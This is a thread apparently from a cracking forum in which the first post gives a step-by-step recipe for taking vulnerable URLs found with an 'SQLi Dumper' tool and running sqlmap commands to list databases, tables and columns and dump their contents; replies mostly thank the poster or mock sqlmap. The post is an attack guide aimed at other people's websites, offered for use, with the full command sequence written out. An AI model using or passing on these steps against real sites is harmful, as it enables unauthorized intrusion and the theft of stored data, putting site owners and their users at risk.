Pshyotic 11 [hide] Step 1: After going through the whole SQLi Dumper process, find your injectable URL and hold on to it, these are usually found in the "Injectables" tab. Step 2: Install sqlmap on your preferred operating system, (this requires python) Step 3: Once installed launch sqlmap from here on out we will refer to this as just "sqlmap" (If installed with apt "sqlmap", if being launched via directory "sqlmap.py" or "python sqlmap.py") Step 4: Once you have sqlmap open enter the following into the terminal [sqlmap -u "URL"] include the quotations around the URL. Answer the questions to your preference Step 5: Scanning is done! Time to dump! (List databases): sqlmap -u "URL" --dbs (List tables): sqlmap -u "URL" -D "DATABASE" --tables (List columns): sqlmap -u "URL" -D "DATABASE" -T "TABLE" --columns (Initialize dump): sqlmap -u "URL" -D "DATABASE" -T "TABLE" -C "column1, column2, column3" --dump --eta Once it's done dumping it will notify you of the saved location for the database [/hide] Quote Share this post Link to post Share on other sites
Pr0xyless 0 Left a like ya yeet :fiesta: :hype: Quote Share this post Link to post Share on other sites
karlos 0 good thing bro i like this work Appreciate your hard work. Quote Share this post Link to post Share on other sites
uncrackablehero 3 lemme try your method out boy thank you ! Quote Share this post Link to post Share on other sites
xXDark-HackerXx 0 Lemme guess. SQLMAP? Its not that much faster but eh. Kindof. Quote Share this post Link to post Share on other sites
crackingbruteforceroblox 7 please not SQLMap. Quote Share this post Link to post Share on other sites